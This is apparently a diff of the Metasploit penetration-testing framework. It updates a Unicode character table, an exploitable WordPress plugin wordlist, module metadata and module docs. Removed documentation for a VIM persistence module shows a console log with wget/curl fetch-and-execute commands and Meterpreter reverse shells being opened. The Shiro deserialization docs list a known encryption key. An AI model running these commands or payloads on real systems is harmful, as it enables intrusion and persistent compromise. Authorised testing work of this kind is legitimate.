 	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
@@ -2294,7 +2481,7 @@ void init()
 	c = 0x1f680;		// from ROCKET
 	while (c <= 0x1f6d7)	// ..to ELEVATOR
 		charset[i++] = c++;
-	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	c = 0x1f6dc;		// from WIRELESS
 	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
 		charset[i++] = c++;
 	c = 0x1f6f0;		// from SATELLITE
@@ -2302,15 +2489,19 @@ void init()
 		charset[i++] = c++;
 // 1F700..1F77F; Alchemical Symbols
 	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
-	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+	while (c <= 0x1f776)	// ..to LUNAR ECLIPSE
+		charset[i++] = c++;
+	c = 0x1f77b;		// from HAUMEA
+	while (c <= 0x1f77f)	// ..to ORCUS
 		charset[i++] = c++;
 // 1F780..1F7FF; Geometric Shapes Extended
 	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
-	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+	while (c <= 0x1f7d9)	// ..to NINE POINTED WHITE STAR
 		charset[i++] = c++;
 	c = 0x1f7e0;		// from LARGE ORANGE CIRCLE
 	while (c <= 0x1f7eb)	// ..to LARGE BROWN SQUARE
 		charset[i++] = c++;
+	charset[i++] = 0x1f7f0;	// HEAVY EQUALS SIGN
 // 1F800..1F8FF; Supplemental Arrows-C
 	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
 	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
@@ -2327,16 +2518,13 @@ void init()
 	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
 	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
 		charset[i++] = c++;
-	charset[i++] = 0x1f8b0;	// ARROW POINTING UPWARDS THEN NORTH WEST
-	charset[i++] = 0x1f8b1;	// ARROW POINTING RIGHTWARDS THEN CURVING SOUTH WEST
+	c = 0x1f8b0;		// from ARROW POINTING UPWARDS THEN NORTH WEST
+	while (c <= 0x1f8bb)	// ..to SOUTH WEST ARROW FROM BAR
+		charset[i++] = c++;
+	charset[i++] = 0x1f8c0;	// LEFTWARDS ARROW FROM DOWNWARDS ARROW
+	charset[i++] = 0x1f8c1;	// RIGHTWARDS ARROW FROM DOWNWARDS ARROW
 // 1F900..1F9FF; Supplemental Symbols and Pictographs
 	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
-	while (c <= 0x1f978)	// ..to DISGUISED FACE
-		charset[i++] = c++;
-	c = 0x1f97a;		// from FACE WITH PLEADING EYES
-	while (c <= 0x1f9cb)	// ..to BUBBLE TEA
-		charset[i++] = c++;
-	c = 0x1f9cd;		// from STANDING PERSON
 	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
 		charset[i++] = c++;
 // 1FA00..1FA6F; Chess Symbols
@@ -2348,41 +2536,37 @@ void init()
 		charset[i++] = c++;
 // 1FA70..1FAFF; Symbols and Pictographs Extended-A
 	c = 0x1fa70;		// from BALLET SHOES
-	while (c <= 0x1fa74)	// ..to THONG SANDAL
+	while (c <= 0x1fa7c)	// ..to CRUTCH
 		charset[i++] = c++;
-	charset[i++] = 0x1fa78;	// DROP OF BLOOD
-	charset[i++] = 0x1fa7a;	// STETHOSCOPE
 	c = 0x1fa80;		// from YO-YO
-	while (c <= 0x1fa86)	// ..to NESTING DOLLS
+	while (c <= 0x1fa89)	// ..to HARP
 		charset[i++] = c++;
-	c = 0x1fa90;		// from RINGED PLANET
-	while (c <= 0x1faa8)	// ..to ROCK
+	c = 0x1fa8f;		// from SHOVEL
+	while (c <= 0x1fac6)	// ..to FINGERPRINT
 		charset[i++] = c++;
-	c = 0x1fab0;		// from FLY
-	while (c <= 0x1fab6)	// ..to FEATHER
+	c = 0x1face;		// from MOOSE
+	while (c <= 0x1fadc)	// ..to ROOT VEGETABLE
 		charset[i++] = c++;
-	charset[i++] = 0x1fac0;	// ANATOMICAL HEART
-	charset[i++] = 0x1fac2;	// PEOPLE HUGGING
-	c = 0x1fad0;		// from BLUEBERRIES
-	while (c <= 0x1fad6)	// ..to TEAPOT
+	c = 0x1fadf;		// from SPLATTER
+	while (c <= 0x1fae9)	// ..to FACE WITH BAGS UNDER EYES
+		charset[i++] = c++;
+	c = 0x1faf0;		// from HAND WITH INDEX FINGER AND THUMB CROSSED
+	while (c <= 0x1faf8)	// ..to RIGHTWARDS PUSHING HAND
 		charset[i++] = c++;
 // 1FB00..1FBFF; Symbols for Legacy Computing
 	c = 0x1fb00;		// from BLOCK SEXTANT-1
 	while (c <= 0x1fb92)	// ..to UPPER HALF INVERSE MEDIUM SHADE AND LOWER HALF BLOCK
 		charset[i++] = c++;
 	c = 0x1fb94;		// from LEFT HALF INVERSE MEDIUM SHADE AND RIGHT HALF BLOCK
-	while (c <= 0x1fbca)	// ..to WHITE UP-POINTING CHEVRON
-		charset[i++] = c++;
-	c = 0x1fbf0;		// from SEGMENTED DIGIT ZERO
 	while (c <= 0x1fbf9)	// ..to SEGMENTED DIGIT NINE
 		charset[i++] = c++;
 // 20000..2A6DF; CJK Unified Ideographs Extension B
 	c = 0x20000;		// from <CJK Ideograph Extension B, First>
-	while (c <= 0x2a6dd)	// ..to <CJK Ideograph Extension B, Last>
+	while (c <= 0x2a6df)	// ..to <CJK Ideograph Extension B, Last>
 		charset[i++] = c++;
 // 2A700..2B73F; CJK Unified Ideographs Extension C
 	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
-	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+	while (c <= 0x2b739)	// ..to <CJK Ideograph Extension C, Last>
 		charset[i++] = c++;
 // 2B740..2B81F; CJK Unified Ideographs Extension D
 	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
@@ -2396,6 +2580,10 @@ void init()
 	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
 	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
 		charset[i++] = c++;
+// 2EBF0..2EE5F; CJK Unified Ideographs Extension I
+	c = 0x2ebf0;		// from <CJK Ideograph Extension I, First>
+	while (c <= 0x2ee5d)	// ..to <CJK Ideograph Extension I, Last>
+		charset[i++] = c++;
 // 2F800..2FA1F; CJK Compatibility Ideographs Supplement
 	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
 	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
@@ -2404,6 +2592,10 @@ void init()
 	c = 0x30000;		// from <CJK Ideograph Extension G, First>
 	while (c <= 0x3134a)	// ..to <CJK Ideograph Extension G, Last>
 		charset[i++] = c++;
+// 31350..323AF; CJK Unified Ideographs Extension H
+	c = 0x31350;		// from <CJK Ideograph Extension H, First>
+	while (c <= 0x323af)	// ..to <CJK Ideograph Extension H, Last>
+		charset[i++] = c++;
 // E0000..E007F; Tags
 	c = 0xe0020;		// from TAG SPACE
 	while (c <= 0xe007f)	// ..to CANCEL TAG

data/wordlists/wp-exploitable-plugins.txt

@@ -10,7 +10,6 @@ bulletproof-security
 catch-themes-demo-import
 chopslider
 custom-registration-form-builder-with-submission-manager
-depicter
 download-manager
 drag-and-drop-multiple-file-upload-contact-form-7
 dukapress
@@ -30,6 +29,7 @@ learnpress
 loginizer
 masterstudy-lms-learning-management-system
 modern-events-calendar-lite
+modern-events-calendar-lite
 nextgen-gallery
 ninja-forms
 paid-memberships-pro
@@ -48,11 +48,7 @@ simple-file-list
 slideshow-gallery
 sp-client-document-manager
 subscribe-to-comments
-suretriggers
-tatsu
 ultimate-member
-user-registration
-user-registration-pro
 website-contact-form-with-file-upload
 woocommerce-abandoned-cart
 woocommerce-payments
@@ -60,17 +56,18 @@ wordpress-mobile-pack
 wordpress-popular-posts
 work-the-flow-file-upload
 wp-automatic
-wpdiscuz
 wp-easycart
 wp-fastest-cache
 wp-file-manager
 wp-gdpr-compliance
 wp-mobile-detector
 wp-mobile-edition
-wps-hide-login
-wpshop
+wp-symposium
 wp-symposium
 wp-time-capsule
-wptouch
 wp-ultimate-csv-importer
+wpdiscuz
+wps-hide-login
+wpshop
+wptouch
 wysija-newsletters

db/modules_metadata_base.json

@@ -31138,7 +31138,7 @@
     "autofilter_ports": [],
     "autofilter_services": [],
     "targets": null,
-    "mod_time": "2026-05-07 11:29:41 +0000",
+    "mod_time": "2025-06-20 13:20:44 +0000",
     "path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
     "is_install_path": true,
     "ref_name": "scanner/dns/dns_amp",
@@ -31334,6 +31334,43 @@
     "needs_cleanup": false,
     "actions": []
   },
+  "auxiliary_scanner/ftp/anonymous": {
+    "name": "Anonymous FTP Access Detection",
+    "fullname": "auxiliary/scanner/ftp/anonymous",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Matteo Cantoni <goony@nothink.org>"
+    ],
+    "description": "Detect anonymous (read/write) FTP server access.",
+    "references": [
+      "URL-https://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 21,
+    "autofilter_ports": [
+      21,
+      2121
+    ],
+    "autofilter_services": [
+      "ftp"
+    ],
+    "targets": null,
+    "mod_time": "2026-03-11 13:47:18 +0000",
+    "path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ftp/anonymous",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
   "auxiliary_scanner/ftp/bison_ftp_traversal": {
     "name": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure",
     "fullname": "auxiliary/scanner/ftp/bison_ftp_traversal",
@@ -31482,55 +31519,6 @@
     "needs_cleanup": false,
     "actions": []
   },
-  "auxiliary_scanner/ftp/ftp_anonymous": {
-    "name": "Anonymous FTP Access Detection",
-    "fullname": "auxiliary/scanner/ftp/ftp_anonymous",
-    "aliases": [
-      "auxiliary/scanner/ftp/anonymous"
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "Matteo Cantoni <goony@nothink.org>",
-      "g0tmi1k"
-    ],
-    "description": "Detect anonymous (read/write) FTP service access.",
-    "references": [
-      "URL-https://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP",
-      "CVE-1999-0497"
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 21,
-    "autofilter_ports": [
-      21,
-      2121
-    ],
-    "autofilter_services": [
-      "ftp"
-    ],
-    "targets": null,
-    "mod_time": "2026-05-06 14:46:53 +0000",
-    "path": "/modules/auxiliary/scanner/ftp/ftp_anonymous.rb",
-    "is_install_path": true,
-    "ref_name": "scanner/ftp/ftp_anonymous",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "ioc-in-logs"
-      ],
-      "Reliability": []
-    },
-    "session_types": false,
-    "needs_cleanup": false,
-    "actions": []
-  },
   "auxiliary_scanner/ftp/ftp_login": {
     "name": "FTP Authentication Scanner",
     "fullname": "auxiliary/scanner/ftp/ftp_login",
@@ -45200,7 +45188,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2026-04-30 16:35:21 +0000",
+    "mod_time": "2025-06-23 09:30:35 +0000",
     "path": "/modules/auxiliary/scanner/http/trace.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/trace",
@@ -84795,7 +84783,7 @@
     "targets": [
       "PHP Command"
     ],
-    "mod_time": "2026-05-06 11:58:50 +0000",
+    "mod_time": "2026-04-22 11:55:15 +0000",
     "path": "/modules/exploits/linux/http/projectsend_unauth_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/projectsend_unauth_rce",
@@ -92290,7 +92278,7 @@
     "targets": [
       "Linux Command"
     ],
-    "mod_time": "2026-04-30 19:54:25 +0000",
+    "mod_time": "2026-04-30 17:51:30 +0000",
     "path": "/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb",
     "is_install_path": true,
     "ref_name": "linux/local/cve_2026_31431_copy_fail",
@@ -98342,7 +98330,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2026-01-08 21:00:39 +0000",
     "path": "/modules/exploits/linux/persistence/autostart.rb",
     "is_install_path": true,
     "ref_name": "linux/persistence/autostart",
@@ -98492,7 +98480,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2026-05-07 20:06:32 +0000",
+    "mod_time": "2026-02-18 12:24:09 +0000",
     "path": "/modules/exploits/linux/persistence/emacs_extension.rb",
     "is_install_path": true,
     "ref_name": "linux/persistence/emacs_extension",
@@ -98650,7 +98638,7 @@
       "systemd",
       "systemd user"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2026-01-08 21:00:39 +0000",
     "path": "/modules/exploits/linux/persistence/init_systemd.rb",
     "is_install_path": true,
     "ref_name": "linux/persistence/init_systemd",
@@ -98995,56 +98983,6 @@
     "needs_cleanup": null,
     "actions": []
   },
-  "exploit_linux/persistence/vim_plugin": {
-    "name": "VIM Plugin Persistence",
-    "fullname": "exploit/linux/persistence/vim_plugin",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1991-11-03",
-    "type": "exploit",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module creates a VIM Plugin which executes a payload on VIM startup.",
-    "references": [
-      "URL-https://vimways.org/2019/writing-vim-plugin/",
-      "URL-https://www.linode.com/docs/guides/writing-a-vim-plugin/",
-      "ATT&CK-T1546"
-    ],
-    "platform": "Linux",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Auto"
-    ],
-    "mod_time": "2026-05-07 14:17:43 +0000",
-    "path": "/modules/exploits/linux/persistence/vim_plugin.rb",
-    "is_install_path": true,
-    "ref_name": "linux/persistence/vim_plugin",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "config-changes"
-      ]
-    },
-    "session_types": [
-      "meterpreter",
-      "shell"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
   "exploit_linux/persistence/wsl/startup_folder": {
     "name": "Linux WSL via Startup Folder Persistence",
     "fullname": "exploit/linux/persistence/wsl/startup_folder",
@@ -119679,7 +119617,7 @@
     "author": [
       "L / l-codes <L / l-codes@qq.com>"
     ],
-    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable\n          installations of Apache Shiro v1.2.4. Note that other versions of Apache Shiro may\n          also be exploitable if the encryption key used by Shiro to encrypt rememberMe\n          cookies is known.\n\n          The gadget chain used for Java deserialization must be present on the target's classpath.",
+    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable\n          installations of Apache Shiro v1.2.4. Note that other versions of Apache Shiro may\n          also be exploitable if the encryption key used by Shiro to encrypt rememberMe\n          cookies is known.",
     "references": [
       "CVE-2016-4437",
       "URL-https://github.com/Medicean/VulApps/tree/master/s/shiro/1"
@@ -119706,7 +119644,7 @@
       "Unix Command payload",
       "Windows Command payload"
     ],
-    "mod_time": "2026-05-05 17:12:22 +0000",
+    "mod_time": "2025-12-17 16:12:31 +0000",
     "path": "/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb",
     "is_install_path": true,
     "ref_name": "multi/http/shiro_rememberme_v124_deserialize",
@@ -130721,7 +130659,7 @@
       "OSX",
       "Windows"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2025-12-17 16:12:31 +0000",
     "path": "/modules/exploits/multi/persistence/obsidian_plugin.rb",
     "is_install_path": true,
     "ref_name": "multi/persistence/obsidian_plugin",
@@ -130829,7 +130767,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2026-01-08 21:00:39 +0000",
     "path": "/modules/exploits/multi/persistence/python_site_specific_hook.rb",
     "is_install_path": true,
     "ref_name": "multi/persistence/python_site_specific_hook",
@@ -134227,7 +134165,7 @@
       "Python payload",
       "Command payload"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2025-09-23 16:59:26 +0000",
     "path": "/modules/exploits/osx/persistence/launch_plist.rb",
     "is_install_path": true,
     "ref_name": "osx/persistence/launch_plist",
@@ -204261,7 +204199,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2025-12-21 08:00:03 +0000",
     "path": "/modules/exploits/windows/persistence/notepadpp_plugin.rb",
     "is_install_path": true,
     "ref_name": "windows/persistence/notepadpp_plugin",
@@ -204311,7 +204249,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2026-05-07 14:31:12 +0000",
+    "mod_time": "2026-04-13 14:56:04 +0000",
     "path": "/modules/exploits/windows/persistence/powershell_profile.rb",
     "is_install_path": true,
     "ref_name": "windows/persistence/powershell_profile",
@@ -213854,7 +213792,7 @@
       "Spencer McIntyre",
       "Jonathan Salwan"
     ],
-    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell",
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command",
     "references": [],
     "platform": "Linux",
     "arch": "cmd",
@@ -218215,7 +218153,7 @@
       "Spencer McIntyre",
       "Jonathan Salwan"
     ],
-    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell",
+    "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command",
     "references": [],
     "platform": "Linux",
     "arch": "cmd",
@@ -222576,7 +222514,7 @@
       "Spencer McIntyre",
       "Jonathan Salwan"
     ],
-    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell",
+    "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command",
     "references": [],
     "platform": "Linux",
     "arch": "cmd",
@@ -271797,7 +271735,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-01 13:50:15 +0000",
+    "mod_time": "2026-04-30 15:55:14 +0000",
     "path": "/modules/payloads/singles/linux/aarch64/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/aarch64/exec",
@@ -272207,10 +272145,9 @@
     "disclosure_date": null,
     "type": "payload",
     "author": [
-      "Jonathan Salwan",
-      "Spencer McIntyre"
+      "Jonathan Salwan"
     ],
-    "description": "Execute an arbitrary command or just a /bin/sh shell",
+    "description": "Execute an arbitrary command",
     "references": [],
     "platform": "Linux",
     "arch": "armle",
@@ -272218,7 +272155,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-04 13:49:03 +0000",
+    "mod_time": "2025-04-20 02:57:34 +0000",
     "path": "/modules/payloads/singles/linux/armle/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/armle/exec",
@@ -273856,7 +273793,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2025-04-20 02:57:34 +0000",
     "path": "/modules/payloads/singles/linux/x64/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/exec",
@@ -274151,7 +274088,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2025-07-05 15:57:38 +0000",
     "path": "/modules/payloads/singles/linux/x64/set_hostname.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/set_hostname",
@@ -274539,7 +274476,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2025-04-20 02:57:34 +0000",
     "path": "/modules/payloads/singles/linux/x86/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/exec",
@@ -275081,7 +275018,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2025-04-20 02:57:34 +0000",
     "path": "/modules/payloads/singles/linux/x86/read_file.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/read_file",
@@ -277063,7 +277000,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2025-04-20 02:57:34 +0000",
     "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/shell_reverse_tcp",
@@ -282639,7 +282576,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2026-04-17 05:35:14 +0000",
     "path": "/modules/payloads/singles/windows/download_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/download_exec",
@@ -282774,7 +282711,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2026-04-17 05:35:14 +0000",
     "path": "/modules/payloads/singles/windows/messagebox.rb",
     "is_install_path": true,
     "ref_name": "windows/messagebox",
@@ -289322,7 +289259,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2026-04-17 05:35:14 +0000",
     "path": "/modules/payloads/singles/windows/x64/download_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/download_exec",
@@ -289416,7 +289353,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-05-08 11:48:34 +0000",
+    "mod_time": "2026-04-17 05:35:14 +0000",
     "path": "/modules/payloads/singles/windows/x64/messagebox.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/messagebox",

documentation/modules/auxiliary/scanner/ftp/anonymous.md

@@ -52,7 +52,7 @@ This module allows us to scan through a series of IP Addresses and provide detai
 
 ## Verification Steps
 
-1. Do: ```use auxiliary/scanner/ftp/ftp_anonymous```
+1. Do: ```use auxiliary/scanner/ftp/anonymous```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [IP]```
 4. Do: ```run```
@@ -62,17 +62,17 @@ This module allows us to scan through a series of IP Addresses and provide detai
 ### vsFTPd 3.0.3 on Kali
 
 ```
-msf > use auxiliary/scanner/ftp/ftp_anonymous
-msf auxiliary(ftp_anonymous) > set RHOSTS 127.0.0.1
+msf > use auxiliary/scanner/ftp/anonymous
+msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
-msf auxiliary(ftp_anonymous) > set RPORT 21
+msf auxiliary(anonymous) > set RPORT 21
 RPORT => 21
-msf auxiliary(ftp_anonymous) > exploit
+msf auxiliary(anonymous) > exploit
 
 [+] 127.0.0.1:21          - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf auxiliary(ftp_anonymous) >
+msf auxiliary(anonymous) > 
 ```
 
 ## Confirming using NMAP

documentation/modules/exploit/linux/persistence/vim_plugin.md

@@ -1,99 +0,0 @@
-## Vulnerable Application
-
-This module creates a VIM Plugin which executes a payload on VIM startup.
-
-## Verification Steps
-
-1. Install the application if needed
-2. Start msfconsole
-3. Get a shell on a linux computer with vim installed
-4. Do: `use exploit/linux/persistence/vim_persistence`
-5. Do: `run`
-6. Start `vim` on the remote computer
-7. You should get a shell.
-
-## Options
-
-### NAME
-
-Name of the extension. Defaults to random.
-
-## Scenarios
-
-### vim 9.1.2141 on Kali 2026.1
-
-```
-resource (/root/.msf4/msfconsole.rc)> setg verbose true
-verbose => true
-resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
-lhost => 1.1.1.1
-resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
-payload => cmd/linux/http/x64/meterpreter/reverse_tcp
-resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
-[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
-resource (/root/.msf4/msfconsole.rc)> set target 7
-target => 7
-resource (/root/.msf4/msfconsole.rc)> set srvport 8082
-srvport => 8082
-resource (/root/.msf4/msfconsole.rc)> set uripath l
-uripath => l
-resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
-payload => linux/x64/meterpreter/reverse_tcp
-resource (/root/.msf4/msfconsole.rc)> set lport 4446
-lport => 4446
-resource (/root/.msf4/msfconsole.rc)> run
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-[*] Started reverse TCP handler on 1.1.1.1:4446
-[*] Using URL: http://1.1.1.1:8082/l
-[*] Server started.
-[*] Run the following command on the target machine:
-wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown
-msf exploit(multi/script/web_delivery) >
-[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3090404 bytes) to 1.1.1.1
-[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400
-
-msf exploit(multi/script/web_delivery) > sessions -i 1
-[*] Starting interaction with 1...
-
-meterpreter > getuid
-Server username: h00die
-meterpreter > sysinfo
-Computer     : h00die-kali
-OS           : Debian  (Linux 6.18.12+kali-amd64)
-Architecture : x64
-BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux
-meterpreter > background
-[*] Backgrounding session 1...
-msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence
-[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
-msf exploit(linux/persistence/vim_persistence) > set session 1
-session => 1
-msf exploit(linux/persistence/vim_persistence) > exploit
-[*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV&
-[*] Exploit running as background job 1.
-[*] Exploit completed, but no session was created.
-
-[*] Fetch handler listening on 1.1.1.1:8080
-[*] HTTP server started
-[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
-[*] Started reverse TCP handler on 1.1.1.1:4444
-msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable)
-[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
-[!] The service is running, but could not be validated. VIM is installed
-[*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim
-[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc
-```
-
-Open vim
-
-```
-[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
-[*] Sending payload to 1.1.1.1 (curl/8.18.0)
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3090404 bytes) to 1.1.1.1
-[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400
-```

documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md

@@ -7,10 +7,8 @@ unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
 server as the value to the `rememberMe` cookie. This will result in code
 execution in the context of the web server.
 
-The YSoSerial `CommonsCollections2` payload is known to work and is the
-default gadget chain used by this module. The gadget chain is configurable
-via the `JAVA_GADGET_CHAIN` option; the selected chain must be available on
-the target's classpath.
+The YSoSerial `CommonsCollections2` payload is known to work and is the one
+leveraged by this module.
 
 Note that other versions of Apache Shiro may also be exploitable if the
 encryption key used by Shiro to encrypt `rememberMe` cookies is known.
@@ -31,13 +29,9 @@ You can use <https://github.com/Medicean/VulApps/tree/master/s/shiro/1>.
 3. `run`
 
 ## Options
-
 ### ENC_KEY
 The encryption key the target Apache Shiro server is using to encrypt its `rememberMe` cookies.
 
-### JAVA_GADGET_CHAIN
-The Java deserialization gadget chain to use. The chain must be available on the target's classpath.
-
 ## Scenarios
 
 ### Tested on GNU/Linux x86_64 using Shiro-1.2.4
@@ -49,16 +43,15 @@ msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options
 
 Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):
 
-   Name               Current Setting           Required  Description
-   ----               ---------------           --------  -----------
-   ENC_KEY            kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
-   JAVA_GADGET_CHAIN  CommonsCollections2       yes       The Java gadget chain to use for deserialization
-   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT              80                        yes       The target port (TCP)
-   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI          /                         yes       Base directory path
-   VHOST                                        no        HTTP server virtual host
+   Name       Current Setting           Required  Description
